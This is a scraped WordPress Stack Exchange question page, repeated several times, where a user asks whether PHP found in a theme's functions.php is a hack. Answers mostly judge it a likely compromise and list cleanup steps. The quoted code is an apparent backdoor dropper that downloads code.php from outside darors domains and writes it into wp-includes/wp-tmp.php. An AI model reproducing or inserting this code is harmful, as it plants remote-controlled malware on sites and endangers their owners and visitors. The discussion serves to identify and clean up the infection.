Is this a hacking script in function.php?
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty{ margin-bottom:0;
}
3
I have code like below in neve theme WordPress. I feel suspicious about this code
$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
php hacked
asked Apr 3 at 16:49
Latheesh V M VillaLatheesh V M Villa
3631321
add a comment |
3
I have code like below in neve theme WordPress. I feel suspicious about this code
$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
php hacked
asked Apr 3 at 16:49
Latheesh V M VillaLatheesh V M Villa
3631321
It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on whathttp://www.darors.pw/code.phpcontains.
– ceejayoz
Apr 3 at 19:15
That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?
– butlerblog
Apr 4 at 16:14
@butlerblog Again, without the contents of thatcode.phpfile it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.
– ceejayoz
Apr 4 at 17:44
I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.
– butlerblog
Apr 4 at 18:54
add a comment |
3
3
3
2
I have code like below in neve theme WordPress. I feel suspicious about this code
$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
php hacked
asked Apr 3 at 16:49
Latheesh V M VillaLatheesh V M Villa
3631321
I have code like below in neve theme WordPress. I feel suspicious about this code
$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
php hacked
php hacked
asked Apr 3 at 16:49
Latheesh V M VillaLatheesh V M Villa
3631321
asked Apr 3 at 16:49
Latheesh V M VillaLatheesh V M Villa
3631321
asked Apr 3 at 16:49
Latheesh V M VillaLatheesh V M Villa
3631321
asked Apr 3 at 16:49
Latheesh V M VillaLatheesh V M Villa
3631321
asked Apr 3 at 16:49
Latheesh V M VillaLatheesh V M Villa
3631321
3631321
It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on whathttp://www.darors.pw/code.phpcontains.
– ceejayoz
Apr 3 at 19:15
That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?
– butlerblog
Apr 4 at 16:14
@butlerblog Again, without the contents of thatcode.phpfile it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.
– ceejayoz
Apr 4 at 17:44
I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.
– butlerblog
Apr 4 at 18:54
add a comment |
It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on whathttp://www.darors.pw/code.phpcontains.
– ceejayoz
Apr 3 at 19:15
That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?
– butlerblog
Apr 4 at 16:14
@butlerblog Again, without the contents of thatcode.phpfile it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.
– ceejayoz
Apr 4 at 17:44
I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.
– butlerblog
Apr 4 at 18:54
It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what
http://www.darors.pw/code.php contains.– ceejayoz
Apr 3 at 19:15
It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what
http://www.darors.pw/code.php contains.– ceejayoz
Apr 3 at 19:15
That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?
– butlerblog
Apr 4 at 16:14
That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?
– butlerblog
Apr 4 at 16:14
@butlerblog Again, without the contents of that
code.php file it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.– ceejayoz
Apr 4 at 17:44
@butlerblog Again, without the contents of that
code.php file it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.– ceejayoz
Apr 4 at 17:44
I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.
– butlerblog
Apr 4 at 18:54
I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.
– butlerblog
Apr 4 at 18:54
add a comment |
3 Answers
3
active
oldest
votes
6
I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.
So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:
- changing all passwords (WP admins, FTP, hosting, database)
- reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.
- checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).
There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.
answered Apr 3 at 16:56
Rick HellewellRick Hellewell
4,06421126
These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme'sfunctions.phplike this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?
– jsmod
Apr 3 at 18:14
1
There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.
– Rick Hellewell
Apr 3 at 19:07
1
I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.
– Rick Hellewell
Apr 3 at 19:14
Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?
– jsmod
Apr 3 at 19:27
1
Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.
– Rick Hellewell
Apr 3 at 19:57
add a comment |
1
Yes, most probably yes.
It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.
answered Apr 3 at 16:52
Krzysiek Dróżdż♦Krzysiek Dróżdż
18.6k73349
Thanks for confirming I saw this in my client ..have to warn him about that.
– Latheesh V M Villa
Apr 3 at 16:56
add a comment |
0
That's a possibility.
Although, I think it is a mechanism to push theme updates only for sites with a valid license key.
Alternatively, it is backdoor for deleting theme for any compromised key.
It is difficult to say anything for sure without looking at the content which is downloaded.
answered Apr 4 at 16:02
GauravGaurav
11
add a comment |
Your Answer
StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "110"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});
function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});
}
});
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fwordpress.stackexchange.com%2fquestions%2f333380%2fis-this-a-hacking-script-in-function-php%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
3 Answers
3
active
oldest
votes
3 Answers
3
active
oldest
votes
active
oldest
votes
active
oldest
votes
6
I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.
So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:
- changing all passwords (WP admins, FTP, hosting, database)
- reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.
- checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).
There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.
answered Apr 3 at 16:56
Rick HellewellRick Hellewell
4,06421126
These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme'sfunctions.phplike this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?
– jsmod
Apr 3 at 18:14
1
There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.
– Rick Hellewell
Apr 3 at 19:07
1
I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.
– Rick Hellewell
Apr 3 at 19:14
Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?
– jsmod
Apr 3 at 19:27
1
Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.
– Rick Hellewell
Apr 3 at 19:57
add a comment |
6
I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.
So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:
- changing all passwords (WP admins, FTP, hosting, database)
- reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.
- checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).
There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.
answered Apr 3 at 16:56
Rick HellewellRick Hellewell
4,06421126
These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme'sfunctions.phplike this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?
– jsmod
Apr 3 at 18:14
1
There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.
– Rick Hellewell
Apr 3 at 19:07
1
I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.
– Rick Hellewell
Apr 3 at 19:14
Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?
– jsmod
Apr 3 at 19:27
1
Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.
– Rick Hellewell
Apr 3 at 19:57
add a comment |
6
6
6
I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.
So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:
- changing all passwords (WP admins, FTP, hosting, database)
- reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.
- checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).
There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.
answered Apr 3 at 16:56
Rick HellewellRick Hellewell
4,06421126
I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.
So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:
- changing all passwords (WP admins, FTP, hosting, database)
- reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.
- checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).
There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.
answered Apr 3 at 16:56
Rick HellewellRick Hellewell
4,06421126
answered Apr 3 at 16:56
Rick HellewellRick Hellewell
4,06421126
answered Apr 3 at 16:56
Rick HellewellRick Hellewell
4,06421126
answered Apr 3 at 16:56
Rick HellewellRick Hellewell
4,06421126
4,06421126
These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme'sfunctions.phplike this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?
– jsmod
Apr 3 at 18:14
1
There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.
– Rick Hellewell
Apr 3 at 19:07
1
I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.
– Rick Hellewell
Apr 3 at 19:14
Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?
– jsmod
Apr 3 at 19:27
1
Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.
– Rick Hellewell
Apr 3 at 19:57
add a comment |
These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme'sfunctions.phplike this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?
– jsmod
Apr 3 at 18:14
1
There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.
– Rick Hellewell
Apr 3 at 19:07
1
I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.
– Rick Hellewell
Apr 3 at 19:14
Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?
– jsmod
Apr 3 at 19:27
1
Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.
– Rick Hellewell
Apr 3 at 19:57
These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's
functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?– jsmod
Apr 3 at 18:14
These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's
functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?– jsmod
Apr 3 at 18:14
1
1
There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.
– Rick Hellewell
Apr 3 at 19:07
There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.
– Rick Hellewell
Apr 3 at 19:07
1
1
I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.
– Rick Hellewell
Apr 3 at 19:14
I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.
– Rick Hellewell
Apr 3 at 19:14
Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?
– jsmod
Apr 3 at 19:27
Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?
– jsmod
Apr 3 at 19:27
1
1
Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.
– Rick Hellewell
Apr 3 at 19:57
Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.
– Rick Hellewell
Apr 3 at 19:57
add a comment |
1
Yes, most probably yes.
It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.
answered Apr 3 at 16:52
Krzysiek Dróżdż♦Krzysiek Dróżdż
18.6k73349
Thanks for confirming I saw this in my client ..have to warn him about that.
– Latheesh V M Villa
Apr 3 at 16:56
add a comment |
1
Yes, most probably yes.
It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.
answered Apr 3 at 16:52
Krzysiek Dróżdż♦Krzysiek Dróżdż
18.6k73349
Thanks for confirming I saw this in my client ..have to warn him about that.
– Latheesh V M Villa
Apr 3 at 16:56
add a comment |
1
1
1
Yes, most probably yes.
It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.
answered Apr 3 at 16:52
Krzysiek Dróżdż♦Krzysiek Dróżdż
18.6k73349
Yes, most probably yes.
It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.
answered Apr 3 at 16:52
Krzysiek Dróżdż♦Krzysiek Dróżdż
18.6k73349
answered Apr 3 at 16:52
Krzysiek Dróżdż♦Krzysiek Dróżdż
18.6k73349
answered Apr 3 at 16:52
Krzysiek Dróżdż♦Krzysiek Dróżdż
18.6k73349
answered Apr 3 at 16:52
Krzysiek Dróżdż♦Krzysiek Dróżdż
18.6k73349
18.6k73349
Thanks for confirming I saw this in my client ..have to warn him about that.
– Latheesh V M Villa
Apr 3 at 16:56
add a comment |
Thanks for confirming I saw this in my client ..have to warn him about that.
– Latheesh V M Villa
Apr 3 at 16:56
Thanks for confirming I saw this in my client ..have to warn him about that.
– Latheesh V M Villa
Apr 3 at 16:56
Thanks for confirming I saw this in my client ..have to warn him about that.
– Latheesh V M Villa
Apr 3 at 16:56
add a comment |
0
That's a possibility.
Although, I think it is a mechanism to push theme updates only for sites with a valid license key.
Alternatively, it is backdoor for deleting theme for any compromised key.
It is difficult to say anything for sure without looking at the content which is downloaded.
answered Apr 4 at 16:02
GauravGaurav
11
add a comment |
0
That's a possibility.
Although, I think it is a mechanism to push theme updates only for sites with a valid license key.
Alternatively, it is backdoor for deleting theme for any compromised key.
It is difficult to say anything for sure without looking at the content which is downloaded.
answered Apr 4 at 16:02
GauravGaurav
11
add a comment |
0
0
0
That's a possibility.
Although, I think it is a mechanism to push theme updates only for sites with a valid license key.
Alternatively, it is backdoor for deleting theme for any compromised key.
It is difficult to say anything for sure without looking at the content which is downloaded.
answered Apr 4 at 16:02
GauravGaurav
11
That's a possibility.
Although, I think it is a mechanism to push theme updates only for sites with a valid license key.
Alternatively, it is backdoor for deleting theme for any compromised key.
It is difficult to say anything for sure without looking at the content which is downloaded.
answered Apr 4 at 16:02
GauravGaurav
11
answered Apr 4 at 16:02
GauravGaurav
11
answered Apr 4 at 16:02
GauravGaurav
11
answered Apr 4 at 16:02
GauravGaurav
11
11
add a comment |
add a comment |
draft saved
draft discarded
Thanks for contributing an answer to WordPress Development Stack Exchange!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fwordpress.stackexchange.com%2fquestions%2f333380%2fis-this-a-hacking-script-in-function-php%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
